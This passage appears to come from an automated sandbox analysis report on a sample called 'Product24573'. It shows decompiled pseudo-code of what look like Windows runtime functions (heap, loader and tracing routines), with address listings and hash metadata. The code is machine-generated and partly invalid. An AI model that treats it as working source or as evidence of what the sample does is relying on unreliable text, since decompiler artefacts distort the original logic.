									_t214 = L01114620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E011337F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x11e7b10 =  *0x11e7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x11e7b04 =  *0x11e7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L011177F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L011177F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x11e7b08 =  *0x11e7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E011357C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0113F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L011177F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0112A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L011177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E011396C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                          0x0110849b
                                          0x0110849b
                                          0x0110849b
                                          0x0110849b
                                          0x0110849d
                                          0x011084a2
                                          0x011084a7
                                          0x011084b1
                                          0x011084d8
                                          0x00000000
                                          0x011084b3
                                          0x011084c4
                                          0x011084c9
                                          0x011084cd
                                          0x011084cf
                                          0x011084cf
                                          0x011084d6
                                          0x011084e6
                                          0x011084e9
                                          0x011084ec
                                          0x011084ef
                                          0x011084f2
                                          0x011084f4
                                          0x011084fc
                                          0x01108501
                                          0x01108506
                                          0x01108509
                                          0x011086e0
                                          0x011086e5
                                          0x011086e8
                                          0x011086ed
                                          0x011086f0
                                          0x011086f2
                                          0x01159afd
                                          0x01159b02
                                          0x011084da
                                          0x011084df
                                          0x011084df
                                          0x011086fa
                                          0x011086fd
                                          0x011086fe
                                          0x01108701
                                          0x01108706
                                          0x01108709
                                          0x0110870b
                                          0x00000000
                                          0x00000000
                                          0x01108711
                                          0x01108725
                                          0x01108727
                                          0x0110872a
                                          0x0110872c
                                          0x01159af0
                                          0x01159af5
                                          0x01108732
                                          0x01108732
                                          0x01108732
                                          0x01108735
                                          0x01108737
                                          0x01108515
                                          0x01108515
                                          0x01108518
                                          0x0110851d
                                          0x01108523
                                          0x01108527
                                          0x0110852b
                                          0x01108537
                                          0x01108539
                                          0x0110853c
                                          0x0110853e
                                          0x0110868c
                                          0x01108691
                                          0x01108699
                                          0x0110869b
                                          0x01108744
                                          0x01108748
                                          0x011086a1
                                          0x011086a1
                                          0x011086a1
                                          0x011086a4
                                          0x011086a8
                                          0x01159bdf
                                          0x01159bdf
                                          0x011086ae
                                          0x011086b0
                                          0x00000000
                                          0x011086b6
                                          0x00000000
                                          0x01159be9
                                          0x011086b0
                                          0x01108544
                                          0x0110854a
                                          0x0110854d
                                          0x01108551
                                          0x0110876e
                                          0x01108778
                                          0x0110877b
                                          0x01108780
                                          0x01108557
                                          0x01108557
                                          0x0110855d
                                          0x0110855d
                                          0x0110856b
                                          0x0110856e
                                          0x01108570
                                          0x01108573
                                          0x01108576
                                          0x01108576
                                          0x01108579
                                          0x0110857b
                                          0x00000000
                                          0x00000000
                                          0x01108581
                                          0x011085a0
                                          0x011085a2
                                          0x011085a5
                                          0x011085a7
                                          0x01159b1b
                                          0x01159b1b
                                          0x0110862e
                                          0x0110862e
                                          0x01108631
                                          0x01108631
                                          0x01108634
                                          0x01108636
                                          0x01108669
                                          0x01108669
                                          0x0110866b
                                          0x01159bbf
                                          0x01159bc4
                                          0x01159bc8
                                          0x01159bce
                                          0x01159bce
                                          0x01108671
                                          0x01108671
                                          0x01108674
                                          0x01108676
                                          0x01159bae
                                          0x01159bae
                                          0x01108676
                                          0x0110867c
                                          0x0110867e
                                          0x01108688
                                          0x01108688
                                          0x00000000
                                          0x0110867e
                                          0x01108638
                                          0x01108638
                                          0x0110863b
                                          0x0110863e
                                          0x0110863f
                                          0x01108642
                                          0x01108645
                                          0x01108648
                                          0x0110864d
                                          0x01159b69
                                          0x01159b6e
                                          0x01159b7b
                                          0x01159b81
                                          0x01159b85
                                          0x01159b89
                                          0x01159ba7
                                          0x01159b8b
                                          0x01159b91
                                          0x01159b9a
                                          0x01159b9f
                                          0x01159b9f
                                          0x01108788
                                          0x0110878d
                                          0x01108763
                                          0x01108763
                                          0x01108766
                                          0x00000000
                                          0x01108766
                                          0x01159b70
                                          0x00000000
                                          0x01159b70
                                          0x01108656
                                          0x0110865a
                                          0x0110865c
                                          0x01108752
                                          0x01108756
                                          0x00000000
                                          0x00000000
                                          0x0110875e
                                          0x00000000
                                          0x0110875e
                                          0x01108662
                                          0x01108662
                                          0x01108662
                                          0x01108666
                                          0x00000000
                                          0x01108666
                                          0x011085b7
                                          0x011085b9
                                          0x011085bc
                                          0x011085bf
                                          0x011085cc
                                          0x011085d1
                                          0x011085d4
                                          0x011085db
                                          0x011085de
                                          0x011085e0
                                          0x01159b5f
                                          0x00000000
                                          0x01159b5f
                                          0x011085e6
                                          0x011085ea
                                          0x011086c3
                                          0x011086c5
                                          0x011086c8
                                          0x011086ca
                                          0x01159b16
                                          0x00000000
                                          0x01159b16
                                          0x011086d6
                                          0x011085f6
                                          0x011085f6
                                          0x011085f9
                                          0x01108602
                                          0x01108606
                                          0x0110860a
                                          0x0110860b
                                          0x0110860e
                                          0x01108611
                                          0x00000000
                                          0x01108611
                                          0x011085f3
                                          0x00000000
                                          0x011085f3
                                          0x01108619
                                          0x0110861e
                                          0x0110861e
                                          0x01108621
                                          0x01108622
                                          0x01108623
                                          0x01108625
                                          0x0110862c
                                          0x00000000
                                          0x0110873d
                                          0x00000000
                                          0x0110873d
                                          0x01108737
                                          0x0110850f
                                          0x01108512
                                          0x00000000
                                          0x01108512
                                          0x00000000
                                          0x011084d6

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21e47b942a41e3a1de4f8d88bdee47fe24d47c24806dff418e3d2f368a62d55b
                                          • Instruction ID: 38ea604223ab183e8c01baa2be263809d61f2217cd8ecc4ececce32ebc28dcd9
                                          • Opcode Fuzzy Hash: 21e47b942a41e3a1de4f8d88bdee47fe24d47c24806dff418e3d2f368a62d55b
                                          • Instruction Fuzzy Hash: FCB16DB0E04209DFDF2EDFD9C984AADBBB5BF48308F114129E515AB385D7B0A941CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112513A Relevance: .3, Instructions: 258COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0112513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x11ed360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0113D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01112280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01114620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0113F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0110FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x11eb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0113B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                          0x01125142
                                          0x0112514c
                                          0x01125150
                                          0x01125157
                                          0x01125159
                                          0x0112515e
                                          0x01125165
                                          0x01125169
                                          0x0112516c
                                          0x01125172
                                          0x01125176
                                          0x0112517a
                                          0x0112517a
                                          0x0112517a
                                          0x0112517f
                                          0x01166d8b
                                          0x01166d8e
                                          0x01166d91
                                          0x01166d95
                                          0x01166d98
                                          0x01166d9c
                                          0x01166da0
                                          0x01166da3
                                          0x01166da7
                                          0x01166e26
                                          0x01166e26
                                          0x01166e2a
                                          0x011251f9
                                          0x011251f9
                                          0x011251fe
                                          0x01166e33
                                          0x01166e33
                                          0x01166e39
                                          0x01166e3d
                                          0x01166e46
                                          0x01166e50
                                          0x00000000
                                          0x00000000
                                          0x01166e52
                                          0x01166e53
                                          0x01166e56
                                          0x01166e5d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01166e5f
                                          0x01166e67
                                          0x01166e77
                                          0x01166e7f
                                          0x01166e80
                                          0x01166e88
                                          0x01166e90
                                          0x01166e9f
                                          0x01166ea5
                                          0x01166ea9
                                          0x01166eb1
                                          0x01166ebf
                                          0x00000000
                                          0x00000000
                                          0x01166ecf
                                          0x01166ed3
                                          0x00000000
                                          0x00000000
                                          0x01166edb
                                          0x01166ede
                                          0x01166ee1
                                          0x01166ee8
                                          0x01166eeb
                                          0x01166eed
                                          0x01166ef0
                                          0x01166ef4
                                          0x01166ef8
                                          0x01166efc
                                          0x00000000
                                          0x00000000
                                          0x01166f0d
                                          0x01166f11
                                          0x01166f32
                                          0x01166f37
                                          0x01166f3b
                                          0x01166f3e
                                          0x01166f41
                                          0x01166f46
                                          0x00000000
                                          0x00000000
                                          0x01166f4c
                                          0x01166f50
                                          0x01166f50
                                          0x01166f54
                                          0x01166f62
                                          0x01166f65
                                          0x01166f6d
                                          0x01166f7b
                                          0x01166f7b
                                          0x01166f93
                                          0x01166f98
                                          0x01166fa0
                                          0x01166fa6
                                          0x01166fb3
                                          0x01166fb6
                                          0x01166fbf
                                          0x01166fc1
                                          0x01166fd5
                                          0x01166fda
                                          0x01166fda
                                          0x01166fdd
                                          0x01166fe2
                                          0x01166fe7
                                          0x01166feb
                                          0x01166fef
                                          0x01166ff3
                                          0x0112520c
                                          0x0112520c
                                          0x0112520f
                                          0x01125215
                                          0x01125234
                                          0x0112523a
                                          0x0112523a
                                          0x01125244
                                          0x01125245
                                          0x01125246
                                          0x01125251
                                          0x01125251
                                          0x01166f13
                                          0x01166f17
                                          0x01166f17
                                          0x01166f18
                                          0x01166f1b
                                          0x01166f1f
                                          0x01166f23
                                          0x00000000
                                          0x01166f28
                                          0x01125204
                                          0x01125204
                                          0x01125208
                                          0x00000000
                                          0x01125208
                                          0x01125185
                                          0x01125188
                                          0x0112518a
                                          0x0112518e
                                          0x01125195
                                          0x01166db1
                                          0x01166db5
                                          0x01166db9
                                          0x0112519b
                                          0x0112519b
                                          0x0112519e
                                          0x011251a7
                                          0x011251a9
                                          0x011251a9
                                          0x011251b5
                                          0x011251b8
                                          0x011251bb
                                          0x011251be
                                          0x011251c1
                                          0x011251c5
                                          0x011251c9
                                          0x011251cd
                                          0x011251cd
                                          0x011251d8
                                          0x011251dc
                                          0x011251e0
                                          0x01166dcc
                                          0x01166dd0
                                          0x01166dd5
                                          0x01166ddd
                                          0x01166de1
                                          0x01166de1
                                          0x01166de5
                                          0x01166deb
                                          0x01166df1
                                          0x01166df7
                                          0x01166dfd
                                          0x01166e01
                                          0x01166e05
                                          0x01166e09
                                          0x01166e0d
                                          0x01166e11
                                          0x01166e11
                                          0x011251eb
                                          0x01166e1a
                                          0x01166e1f
                                          0x01166e21
                                          0x01166e23
                                          0x00000000
                                          0x011251f1
                                          0x011251f1
                                          0x00000000
                                          0x011251f1

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 506881bdf62bdf008a51784233d4a514889b7fd5dce4a9134591c5e1362840e8
                                          • Instruction ID: 8ad9dbdce4983212949242b720a03712ba16faa8e0c9147d2d6b6a61501f921b
                                          • Opcode Fuzzy Hash: 506881bdf62bdf008a51784233d4a514889b7fd5dce4a9134591c5e1362840e8
                                          • Instruction Fuzzy Hash: E7C112755093818FD358CF28C580A5AFBF2BF89308F14496EF9998B392D771E945CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011203E2 Relevance: .3, Instructions: 254COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E011203E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x11ed360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01120548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0113B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0110B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x11e7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01117D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01117D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01177016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01139830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E011769A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x11e7c04 != 0) {
						_t118 = _v12;
						_t120 = E0117A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x11e7bd8;
						if( *0x11e7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E011395D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E011399A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01173540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E010FB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0113AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x11e8474 - 3;
										if( *0x11e8474 != 3) {
											 *0x11e79dc =  *0x11e79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01117D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01117D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01177016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x11e8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x11e7b00; // 0x0
							asm("ror esi, cl");
							 *0x11eb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E011395D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01107F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                          0x011203f1
                                          0x011203f7
                                          0x011203f9
                                          0x011203fb
                                          0x011203fd
                                          0x01120400
                                          0x0112040a
                                          0x01164c7a
                                          0x01120537
                                          0x01120547
                                          0x01120410
                                          0x01120410
                                          0x01120414
                                          0x01120417
                                          0x0112041a
                                          0x01120421
                                          0x01120424
                                          0x0112042b
                                          0x0112043b
                                          0x0112043e
                                          0x0112043f
                                          0x0112043f
                                          0x01120446
                                          0x01120449
                                          0x0112044c
                                          0x0112044f
                                          0x01120459
                                          0x01164c8d
                                          0x0112045f
                                          0x0112045f
                                          0x0112045f
                                          0x01120467
                                          0x01164c97
                                          0x01164c9d
                                          0x01164ca4
                                          0x01164caa
                                          0x01164caf
                                          0x01164cb1
                                          0x01164cc3
                                          0x01164cb3
                                          0x01164cbc
                                          0x01164cbc
                                          0x01164cc8
                                          0x01164ccb
                                          0x01164cd7
                                          0x01164cda
                                          0x01164cdf
                                          0x01164cdf
                                          0x01164ccb
                                          0x01164ca4
